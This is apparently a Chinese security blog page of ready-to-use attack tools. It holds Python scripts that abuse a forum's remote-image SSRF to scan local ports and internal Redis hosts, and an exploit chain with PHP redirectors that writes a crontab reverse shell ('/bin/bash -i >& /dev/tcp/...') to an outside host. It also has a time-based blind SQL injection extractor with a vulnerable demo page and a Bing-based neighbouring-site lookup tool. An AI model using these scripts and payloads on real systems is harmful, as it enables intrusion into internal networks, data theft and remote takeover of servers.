分类 神器 下的文章

扫描本机开放的端口:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threading
import Queue
import time

threads_count = 2
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
    que.put(str(i))
def run():
    while que.qsize() > 0:
        p = que.get()
        print p + "       \r",
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
                port=p)
            r = requests.get(url,timeout=2.8)
        except:
            lock.acquire()
            print "{port}  Open".format(port=p)
            lock.release()
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()

while que.qsize() > 0:
    time.sleep(1.0)

扫描内网开放6379端口的主机:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-21 14:38:04
import requests
import threading
import Queue
import time
threads_count = 20
que = Queue.Queue()
lock = threading.Lock()
threads = []
ip = "10.171."
for i in range(1,255):
    for j in range(1,255):
        que.put(ip + str(i) + '.'+str(j))
# for i in range(0,255):
#     que.put(ip + str(i))
def run():
    while que.qsize() > 0:
        ip = que.get()
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="65321")
            r = requests.get(url,timeout=5)
            
            try:
                url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="6379")
                r = requests.get(url,timeout=5)
                lock.acquire()
                print ip
                lock.release()
            except :
                lock.acquire()
                print "{ip}  6379 Open".format(ip=ip)
                lock.release()
        except:
            pass

for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()
while que.qsize() > 0:
    time.sleep(1.0)

通过ssrf操作内网redis写任务计划反弹shell:

#!/usr/bin/env python
# coding=utf-8
# email: ringzero@0x557.org

import requests

host = '10.171.26.22'
port = '6379'
bhost = 'phpinfo.me'
bport = '32'

vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'

_location = 'http://tools.phpinfo.me/ssrf.php'

shell_location = 'http://tools.phpinfo.me/shell.php'


#1 flush db

_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#2 set crontab command

_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(

    host = host,

    port = port,

    bhost = bhost,

    bport = bport)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#3 config set dir /var/spool/cron/

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#4 config set dbfilename root

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#5 save to file

_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)

ssrf.php:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

 

shell.php:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>

看了freebuf的mysql延迟注入课程,感觉他那个突破延迟注入时间限制的思路非常不错

课程地址:http://yuntv.letv.com/bcloud.html?uu=cbb16903e4&vu=f69b1ac857&width=1024&height=576

然后自己写了个py的demo,代码写的渣勿笑~

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Sunshie
# @Last Modified time: 2015-08-30 01:48:41
# blog:https://phpinfo.me
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
		def __init__(self, str,x):
				threading.Thread.__init__(self)
				self.str = str
				self.x = x
		def run(self):
			global res
			x=self.x
			j = self.str
			url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
			html = request(url) 
			verify = 'timeout' 
			if verify not in html: 
				res[str(j)] = 0
				#print 1
			else:
				res[str(j)] = 1
	

def request(URL): 
	user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } 
	req = urllib2.Request(URL, None, user_agent)  
	try: 
		request = urllib2.urlopen(req,timeout=2) 
	except Exception ,e: 
		time.sleep(2)
		return 'timeout' 
	return request.read() 	

def curl(url):
	try:
			start = time.clock()
			requests.get(url)
			end = time.clock()
			return int(end)
	except requests.RequestException as e:
			print u"访问出错!"
			exit()
def getLength():
	i = 0
	while True:
		print "[+] Checking: %s \r" %i
		url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
		html = request(url) 
		verify = 'timeout' 
		if verify in html: 
			print u"[+] 数据长度为: %s" %i
			return i
		
		i = i + 1
def bin2dec(string_num):
	return int(string_num, 2)

def getData(dataLength):
	global res
	data = ""
	for x in range(dataLength):
		x = x + 1
		#print x
		threads = []
		for j in range(8):
			result = ""
			j = j + 1
			sb = my_threading(j,x)
			sb.setDaemon(True)
			threads.append(sb)
			#print j
		for t in threads:
				t.start()
		for t in threads:
				t.join()
		#print res
		tmp = ""
		for i in range(8):
			tmp = tmp + str(res[str(i+1)])
		#print chr(bin2dec(tmp))
		res = {}
		result = chr(bin2dec(tmp))
		print result
		data = data + result
		sb = None
	print "[+] ok!"
	print "[+] result:" + data


if __name__ == '__main__':
	stop = False
	res = {}
	length = getLength()
	getData(length)

1.php代码如下:

<?php
/* 
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Sunshie
* @Last Modified time: 2015-08-30 01:46:17
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "这是一个没有任何回显的注入点";

?>

py

如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可

https://phpinfo.me/bing.php  欢迎使用哦

代码:

 

<?php
 
function getIp($url) {
        $data = file_get_contents("http://www.ip138.com/ips138.asp?ip={$url}&action=2");
        preg_match("/(\d+\.\d+\.\d+\.\d+)<\/font>/", $data, $arr);
        if(!empty($arr[1])) {
                return $arr[1];
        }
        return $url;
}
 
function getBing($ip) {
        $ctx = stream_context_create(array(
                        'http' => array(
                                'timeout' => 30,
                                //'proxy' => 'tcp://113.47.46.152:1080',
                                'request_fulluri' => True,
                                'header'=> "User-Agent: BaiduSpider\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
                        )
                )
        );
        $first = 1;
        $res = array();
        while(true) {
                $url = "http://www.bing.com/search?q=ip%3A{$ip}&go=%E6%8F%90%E4%BA%A4&qs=n&first={$first}&form=QBRE&pq=ip%3A{$ip}&sc=0-0&sp=-1&sk=&cvid=5e52385772e24683a0bdf047de60abfc";
                $first = $first + 10;
                $result = file_get_contents($url, False, $ctx); 
                preg_match_all('/<h2><a href="((http|https):\/\/([\w|\.]+)\/)([\w|\/|&|=|\.|\?]+)?" h="ID=\w+,\w+\.\w+">/',$result,$arr);
                if(!empty($arr[1])) {
                        foreach($arr[1] as $v) {
                                array_push($res, $v);
                        } 
                }
                if(!preg_match('/<div class="sw_next">/', $result)) {
                        break;
                }
 
        }
        return array_unique($res);
}
 
//getBing("58.96.186.133");
 
function main() {
        if(isset($_POST["action"])) {
                $action = trim($_POST["action"]);
                if($action == "getip") {
                        $domain = trim($_POST["domain"]);
                        $ip = getIp($domain);
                        echo $ip;
                }
                if($action == "query") {
                        $ip = trim($_POST["ip"]);
                        $res = getBing($ip);
                        echo json_encode($res);
                }
        }
}
 
main();
if(empty($_POST['action'])) {
?>
<!DOCTYPE html>
<html>
        <head>
                <title>必应接口C段查询|c段查询|旁站查询</title>
                <meta charset="utf-8">
                <meta >
                <link rel="stylesheet" href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap.min.css">
                <link rel="stylesheet" href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
                <script src="//cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
                <script src="//cdn.bootcss.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
                <style type="text/css" media="screen">
                        .main{
                                width:90%;
                                //border:1px solid red;
                                margin-top:20px;
                        }
                        .ip{
                                margin-top:10px;
                        }
                        dd{
                                text-indent:10px;
                        }
                </style>
        </head>
        <body>
                <div class="container">
                        <div class="main">
                                <h1>必应接口C段查询 </h1>
                                <form class="form-inline">
                                        <div class="form-group" style="">
                                        <input type="text" id="domain" class="form-control" placeholder="输入你要查询的ip或域名">
                                        </div>
                                        <button type="submit" class="btn btn-success" id="getip">获取ip</button>
                                        <button type="submit" class="btn btn-info" id="query">查询</button>
                                </form>
                                <div class="alert alert-info ip" role="alert" style="display:none">IP:<span id="ip"></span><span id="se"></span></div>
                                <div class="progress" id="jd" style="display:none">
                                  <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" id="b" aria-valuemin="0" aria-valuemax="100" style="width: 0%">
                                          <span class="sr-only">40% Complete (success)</span>
                                  </div>
                                </div>
                                <dl id="result">
 
                                </dl>
                        </div>
                </div>
        </body>
        <script type="text/javascript">
                var ipi = 1;
                $(function() {
                        $("#getip").click(function() {
                                var domain = $("#domain").val();
                                if(domain == "") {
                                        alert("请输入ip或者域名");
                                        return false;
                                }
                                $.post("","action=getip&domain="+domain,function(res) {
                                        var ip = res;
                                        $("#ip").html(ip);
                                        $(".ip").show();
                                        arr = ip.split(".");
                                        start = arr[0] + "." + arr[1] + "." + arr[2] + "." + 1;
                                        end = arr[0] + "." + arr[1] + "." + arr[2] + "." + 255;
                                        $("#se").html(" 查询ip段:" + start + "-" + end)
                                })
                        });
                         
                        $("#query").click(function() {
                                ipi=1;
                                $("#b").css("width","0%");
                                $("#result").html("");
                                $("#jd").show();
                                query();
                                 
                        });
                })
 
                function query() {
                        $("#query").click(function() {
                                return;
                        });
                        var html = "";
                        var b = (ipi/255) * 100;
                        var ip = $("#ip").html();
                        if(ip == "") {
                                alert("骚年请先获取Ip哦");
                                return;
                        }
                        var arr = ip.split(".");
                        var ips = arr[0] + "." + arr[1] + "." + arr[2] + "." + ipi;
                         
                        $.post("","action=query&ip="+ips,function(res) {
                                $("#b").css("width",b+"%");
                                html += "<dt>"+ ips +"</dt>";
                                for(var i in res) {
                                        html += "<dd><a href=\"" + res[i] + "\" target=\"_blank\">" + res[i]+"</a></dd>";
                                         
                                }
                                $("#result").append(html);
                                if(ipi<255) {
                                        ipi++;
                                        query();
                                }
                        },"json");
                }
        </script>
</html>
 
<?php
}
?>